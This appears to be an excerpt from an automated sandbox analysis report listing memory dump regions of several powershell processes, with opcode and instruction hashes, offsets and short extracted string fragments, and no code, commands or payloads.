                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d3b8e5082495df404ccab5e9f7c4fadd0f0639257dfc4581a438e84c093a0464
                                                                                                                                                                        • Instruction ID: e2c5804898a7443abc469191177142ac97de5148c61f24ba38bcddeedfbe840f
                                                                                                                                                                        • Opcode Fuzzy Hash: d3b8e5082495df404ccab5e9f7c4fadd0f0639257dfc4581a438e84c093a0464
                                                                                                                                                                        • Instruction Fuzzy Hash: 72F05E383042408FC3008B1DE458866BBF9AFCA615329149AE585DB732DA62EC11CB50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760617639.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_286d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 798c91c7c1d63f58cdd33c572100a525f2b4af4b6f68658b130d33d295f26857
                                                                                                                                                                        • Instruction ID: 8a13f744b40a319f4b8968c5d2e2c3849b131a0f2ae8a01e61fe3fd7b8ce6c46
                                                                                                                                                                        • Opcode Fuzzy Hash: 798c91c7c1d63f58cdd33c572100a525f2b4af4b6f68658b130d33d295f26857
                                                                                                                                                                        • Instruction Fuzzy Hash: C0F0F979100A80AFD725CF06CD85D23BBF9EBC5624B198499B85A8B712C631FC42CB60
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2a17b93da93c93da344645ed74758dbce6a51f87ec5f22418c6564b7bbe7fe9a
                                                                                                                                                                        • Instruction ID: db8347012a405fa40eca1e1136df365d3e60e2aabf42e44a7812c7c325250a56
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a17b93da93c93da344645ed74758dbce6a51f87ec5f22418c6564b7bbe7fe9a
                                                                                                                                                                        • Instruction Fuzzy Hash: 96F0A7757006149FC7109A59D844A7FB7EAEFCC661B00092DE50DD3340DF30AC4287A1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a7033afcfcc4563fb525930ae5d97f3651e9eb7059748241969d685bbd5eaf72
                                                                                                                                                                        • Instruction ID: 7f29d227e2934cba2aa845968146dd4d15f248fc91eca1adffea3211d8ba12d8
                                                                                                                                                                        • Opcode Fuzzy Hash: a7033afcfcc4563fb525930ae5d97f3651e9eb7059748241969d685bbd5eaf72
                                                                                                                                                                        • Instruction Fuzzy Hash: E7F0E23A7083501BCB0A2675B8582BD3B92ABC6334B080066D50587381CE68190A83B6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6d5e7f045e7cc80beb348e7a4c5f0fdcb6bd2a112619411f4ed00e30fbe0e6de
                                                                                                                                                                        • Instruction ID: b9891e83eb6c158de2733317946e86cee3033afbf1a0bb3cc1e3d1878c9fd7aa
                                                                                                                                                                        • Opcode Fuzzy Hash: 6d5e7f045e7cc80beb348e7a4c5f0fdcb6bd2a112619411f4ed00e30fbe0e6de
                                                                                                                                                                        • Instruction Fuzzy Hash: 8BF027B96005085BE710AB68C0187ABB797DBC1728F10816ACD0A57784CE3A2906CBD2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 85ed8c791441733ce77bd89f909fe78a973f1eeee5bf8c2ad05b0429963ff8b3
                                                                                                                                                                        • Instruction ID: f4a8ec6875bd005d3c83ab5e0c348d151ae65451055edd24af5e8a0df8bad151
                                                                                                                                                                        • Opcode Fuzzy Hash: 85ed8c791441733ce77bd89f909fe78a973f1eeee5bf8c2ad05b0429963ff8b3
                                                                                                                                                                        • Instruction Fuzzy Hash: 6FF0A7793001188FCB10D7ADD8046AAB7E7EFCC6557054155E509CB310DF24CC018B91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 615eb9769bfb7a08850813ce2b7924ed0be2c9a00e6eea6dc27456e2fc61a7da
                                                                                                                                                                        • Instruction ID: 8478df14940c4c3eee969b06d81c6536f56e2a1888cc205629cbfde74ec63941
                                                                                                                                                                        • Opcode Fuzzy Hash: 615eb9769bfb7a08850813ce2b7924ed0be2c9a00e6eea6dc27456e2fc61a7da
                                                                                                                                                                        • Instruction Fuzzy Hash: A0E0ED393005108F82109B5DD458C66B7EAEFCE61571514A9E585CB721DB62EC019B90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 72d8caa4931247bf914cc8ec04b531075fd5c012601e11a8b9bff46d5d56bdd4
                                                                                                                                                                        • Instruction ID: 4dffab3d2411fa58c43b09c8189318f22ff3acbe27f8dc25a793ac12fb1daa89
                                                                                                                                                                        • Opcode Fuzzy Hash: 72d8caa4931247bf914cc8ec04b531075fd5c012601e11a8b9bff46d5d56bdd4
                                                                                                                                                                        • Instruction Fuzzy Hash: FFE026737893D10F8716856EA818066BFFB8BC323030941FBE041CB346DD128D158396
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b14685c5484a74f2e4850a988d343bfdc5bde584dfabfbb90264409d36b8e4e0
                                                                                                                                                                        • Instruction ID: 83e1fe1a94ce24a3a9284da9495fadd6bac70762be72a55b51dee321af3175ac
                                                                                                                                                                        • Opcode Fuzzy Hash: b14685c5484a74f2e4850a988d343bfdc5bde584dfabfbb90264409d36b8e4e0
                                                                                                                                                                        • Instruction Fuzzy Hash: 28F06D709003048BD7609F78E8DC7AABBE9FB44320F004429E14EC7340DB396881CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ca45083c6fd8dd58746215663ddf5177f1515254f37f0c92e6b9f190e2ab8eaa
                                                                                                                                                                        • Instruction ID: fbbfb01e420dfdbe41342e4197f568a961897620b0c75eae1f35f88913bfda5f
                                                                                                                                                                        • Opcode Fuzzy Hash: ca45083c6fd8dd58746215663ddf5177f1515254f37f0c92e6b9f190e2ab8eaa
                                                                                                                                                                        • Instruction Fuzzy Hash: 25E01274C012499F8B80EFB998465AAFFF4EB09204B2085AEC919D7211EA3256168BE1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $cqk$4'^q$4'^q$4'^q$4'^q$84|l$84|l$piFk$tP^q$tP^q$r~l$r~l
                                                                                                                                                                        • API String ID: 0-2175947571
                                                                                                                                                                        • Opcode ID: 2a103190f8186a7c5ab3475e3d21a1a28287a77b72b8465a3cc4e473eb09fef9
                                                                                                                                                                        • Instruction ID: 17a1db41646de82f1e391a95d1777152d071a2004f0af76e2aa2f2f47f9aae2b
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a103190f8186a7c5ab3475e3d21a1a28287a77b72b8465a3cc4e473eb09fef9
                                                                                                                                                                        • Instruction Fuzzy Hash: A0D16DB1B0422EEFCB26CB68840466ABBF2AFC5311F15846BD5158B2D1DB31C867E791
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$tl$tl
                                                                                                                                                                        • API String ID: 0-4116796712
                                                                                                                                                                        • Opcode ID: 8ba1f4b49e85cac18756c76e30506931d2f253b8cf52ed66ca75f433092cca63
                                                                                                                                                                        • Instruction ID: dedf53e05fbd0c955b2acd3682328158d27320cca554892b130576e3c80ba6e3
                                                                                                                                                                        • Opcode Fuzzy Hash: 8ba1f4b49e85cac18756c76e30506931d2f253b8cf52ed66ca75f433092cca63
                                                                                                                                                                        • Instruction Fuzzy Hash: D5A189B27043658FCB2A8B698805766BBF2AFC6710F1480BBD555CB2D1CB39C863D361
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: fcq$4'^q$4'^q$4'^q$4'^q$r~l$r~l
                                                                                                                                                                        • API String ID: 0-1826034293
                                                                                                                                                                        • Opcode ID: f2a707b206769c929af3c62ef46776aa591cfd623ed1f4c4107a18fed8945f0c
                                                                                                                                                                        • Instruction ID: c81d50094155ac7c2d8073b3820ffc8882d92b68c0f94ae12aa0d2baa6459338
                                                                                                                                                                        • Opcode Fuzzy Hash: f2a707b206769c929af3c62ef46776aa591cfd623ed1f4c4107a18fed8945f0c
                                                                                                                                                                        • Instruction Fuzzy Hash: 20F198B17042658FCB258B78841576ABFA2AFCA311F14C1BAD54ACB282CB31DC53D7A1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q$tl$tl
                                                                                                                                                                        • API String ID: 0-750435783
                                                                                                                                                                        • Opcode ID: 0a91e5d5a9ea016b05e4a160b5b5cc2599640dd2b38aa949f377d17e500415ce
                                                                                                                                                                        • Instruction ID: 255124915b972bbcc51f0aacf72e2eae99dc38f4d141ef14454ab80ce2570ebe
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a91e5d5a9ea016b05e4a160b5b5cc2599640dd2b38aa949f377d17e500415ce
                                                                                                                                                                        • Instruction Fuzzy Hash: D45168F17043268FCB2A5A698402766BBF2AFC6611F14806BD465CF2C1DF39C867D7A1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: 48e8c9c227590b71146ca53adb92e20e0948786bb68c3ca17c7bab2e47bf537b
                                                                                                                                                                        • Instruction ID: 695c26571778392c4d79d9788feaa233f4c8bce844990c2a39cdf65da4e62b4e
                                                                                                                                                                        • Opcode Fuzzy Hash: 48e8c9c227590b71146ca53adb92e20e0948786bb68c3ca17c7bab2e47bf537b
                                                                                                                                                                        • Instruction Fuzzy Hash: 6EB19474E002199FDB54DFA9D990A9EFBF2FF48304F108629E819AB314DB30A945CF91
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: dfc36595498dc4255e73732cf6ae6ae56c759f8728e0738bfb0aa76d36fb8146
                                                                                                                                                                        • Instruction ID: de35fa92a3d93c606870830abff9d7ff0a1b090dae00e5a59bf9a542807df86d
                                                                                                                                                                        • Opcode Fuzzy Hash: dfc36595498dc4255e73732cf6ae6ae56c759f8728e0738bfb0aa76d36fb8146
                                                                                                                                                                        • Instruction Fuzzy Hash: B4B18374E002199FDB54DFA9D990A9EFBF6FF48304F108629E819AB314DB30A945CF91
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: b2078bccadce342ac4d26b0046c099685e3cdfafa2bdd8bde7a1da808d998e89
                                                                                                                                                                        • Instruction ID: 17afd6ce2a67f9ad68310bb59c98dc3561f4e7cf45053a5e5ee72c4c3314654a
                                                                                                                                                                        • Opcode Fuzzy Hash: b2078bccadce342ac4d26b0046c099685e3cdfafa2bdd8bde7a1da808d998e89
                                                                                                                                                                        • Instruction Fuzzy Hash: 3DB19374E002199FDB54DFA9D990A9DFBF2FF48304F108629E819AB315EB31A945CF90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                        • API String ID: 0-2125118731
                                                                                                                                                                        • Opcode ID: be533b48b5e362c659225cf66baa72fc9aec472f301494bdd8b591165113be12
                                                                                                                                                                        • Instruction ID: 267628e04ab6076f56371a1f7d672e556c089f6ce4e93a6d839c21c786d7d2db
                                                                                                                                                                        • Opcode Fuzzy Hash: be533b48b5e362c659225cf66baa72fc9aec472f301494bdd8b591165113be12
                                                                                                                                                                        • Instruction Fuzzy Hash: EA214CB27003269BDB28197B8882737B7D75BC0711F64847AE605CB3C5DF75C8629361
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                        • API String ID: 0-2049395529
                                                                                                                                                                        • Opcode ID: 0dbcbdf49134b22ea462f98f228c2e5ed9b694acad2d882a1897e7354ed26611
                                                                                                                                                                        • Instruction ID: ea09c74bb02b3d20625384f0ab68303aa8d267783b5a275195fc932a2fe77b58
                                                                                                                                                                        • Opcode Fuzzy Hash: 0dbcbdf49134b22ea462f98f228c2e5ed9b694acad2d882a1897e7354ed26611
                                                                                                                                                                        • Instruction Fuzzy Hash: 6E01D66170D7664FC72F062809242666FF25FC7A11B1A46D7C081CF2D6CE245D8B87AB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1818441848.000000000401D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0401D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_401d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 29ab95be87bdfda51ce3c589971178460e0faf538ccd5948077cabff1d9ddcd4
                                                                                                                                                                        • Instruction ID: 5a00f975788f8f7de427d213281b0294d61c585f8bb39617870cc772f516f8bd
                                                                                                                                                                        • Opcode Fuzzy Hash: 29ab95be87bdfda51ce3c589971178460e0faf538ccd5948077cabff1d9ddcd4
                                                                                                                                                                        • Instruction Fuzzy Hash: DE01F272508340AAE7618E29ECC4B67BFD8DF51325F08C41AED492B292C778B841D7B2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1818441848.000000000401D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0401D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_401d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: be98aba16e34e34fbdb812e2244839e446987e981b28687a2e65f68367fce574
                                                                                                                                                                        • Instruction ID: ed56f3c4a15ea696d8a56fd0d41107f4d0294f8feff462b94a1d29b9d9045e57
                                                                                                                                                                        • Opcode Fuzzy Hash: be98aba16e34e34fbdb812e2244839e446987e981b28687a2e65f68367fce574
                                                                                                                                                                        • Instruction Fuzzy Hash: 5601527240E3C09ED7534B259C94B52BFB4DF53224F1980CBD9889F1A3C2696845C772
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1818762315.0000000004100000.00000040.00000800.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e5678527aab11f683e85254ff1de5a20ee1e4a55f8dd20bfd34ad135bbf47983
                                                                                                                                                                        • Instruction ID: 2e131bf6ba8b01058b8f18cc7917c000d1907ede1ff7545b9ae79e256ae89d7c
                                                                                                                                                                        • Opcode Fuzzy Hash: e5678527aab11f683e85254ff1de5a20ee1e4a55f8dd20bfd34ad135bbf47983
                                                                                                                                                                        • Instruction Fuzzy Hash: B4610871E00248DFCB14DFA9D584A9DBBF2FF88314F158569E509AB354DB349C46CBA0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: bd3fc5be9edad31748234ebe1a4602e2445d5a4212f83d9d667b50c72fc2b1c0
                                                                                                                                                                        • Instruction ID: 6050bb09b501f75d08fdac435455d94d636800dd5e39358ec7d82c3823a9b3d5
                                                                                                                                                                        • Opcode Fuzzy Hash: bd3fc5be9edad31748234ebe1a4602e2445d5a4212f83d9d667b50c72fc2b1c0
                                                                                                                                                                        • Instruction Fuzzy Hash: 5C515EB47002058FCB10DF6DD594D6ABBE6EF89314B588469E559CF396EF30EC018B91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 653444f14fb8ed8a6cd806833cb8db6260bd0d8d15fe17f8959a414a12806818
                                                                                                                                                                        • Instruction ID: a54776ee4d648c479a79c0336c72622c1d1778812112cd861a4e5ec4dc6d0134
                                                                                                                                                                        • Opcode Fuzzy Hash: 653444f14fb8ed8a6cd806833cb8db6260bd0d8d15fe17f8959a414a12806818
                                                                                                                                                                        • Instruction Fuzzy Hash: CD4109B4B002058FCB10EF6DD694D6ABBE6EF89314B588468E549CF355EF30ED068B91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2e41cb9eade5e10672a8b5a2184d8cb5fb78ea64fa274fc62d329eee1b589580
                                                                                                                                                                        • Instruction ID: e0b02263bad5b072b686fccfd9648b5cd92a3f024b206eea6cdfccc38898d52c
                                                                                                                                                                        • Opcode Fuzzy Hash: 2e41cb9eade5e10672a8b5a2184d8cb5fb78ea64fa274fc62d329eee1b589580
                                                                                                                                                                        • Instruction Fuzzy Hash: 894148B4A006059FCB06CF59C4D8AAEFBB1FF48310B158599D916AB365C736FC91CBA0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 340a529871b5ed6018d4cde2b0fcccdeb9115c899c485cad4b44e2f552c4647d
                                                                                                                                                                        • Instruction ID: 7816ff74ded929c027decc5b695a893d8abbf68238acdd0e151b9d2cbd9bb2c4
                                                                                                                                                                        • Opcode Fuzzy Hash: 340a529871b5ed6018d4cde2b0fcccdeb9115c899c485cad4b44e2f552c4647d
                                                                                                                                                                        • Instruction Fuzzy Hash: B3317C713006119FC705AB78E894B9AB7A7EFC4312F048669E50ACB350DF74A845CBE1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7e2f88bfc944cdf860b86cbac1d37b530fd1f0be2a7b3fa7319dab0a67c8726a
                                                                                                                                                                        • Instruction ID: 435afd4f116798f7f25acb935f300788a9254a1043a856b15f6f87b409b632ce
                                                                                                                                                                        • Opcode Fuzzy Hash: 7e2f88bfc944cdf860b86cbac1d37b530fd1f0be2a7b3fa7319dab0a67c8726a
                                                                                                                                                                        • Instruction Fuzzy Hash: 4B313B34A002158FDB19CF68C9A8AAABBF1EF8D315F1544A9E446EB391DF31DC41CB60
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 39f27243b7beff9c51bf8147707683447dc8545d8bdce875a8928af541421774
                                                                                                                                                                        • Instruction ID: bc8397f6430e475f240265b3eae4b005b76039233c872a0d1f4b874993fd0ac3
                                                                                                                                                                        • Opcode Fuzzy Hash: 39f27243b7beff9c51bf8147707683447dc8545d8bdce875a8928af541421774
                                                                                                                                                                        • Instruction Fuzzy Hash: A6315E71A002099FDB04DFB9D4957AEBBF6EF89310F148069E506E7350EF749C418B91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 92039ef9f22d091898ea8beeeadf82be63035fa988c7be139857c6a8b41763a6
                                                                                                                                                                        • Instruction ID: 77843857ca7d40d5ebf4d8a00d4d7a01a51f61bcdfd00fef85bcf200e6f7cccd
                                                                                                                                                                        • Opcode Fuzzy Hash: 92039ef9f22d091898ea8beeeadf82be63035fa988c7be139857c6a8b41763a6
                                                                                                                                                                        • Instruction Fuzzy Hash: 9931B0B8A002089FDB04EF64D854ABE7BB3EF85300F1184A9D115AB395DE389D45CFA1
                                                                                                                                                                        Memory Dump Source
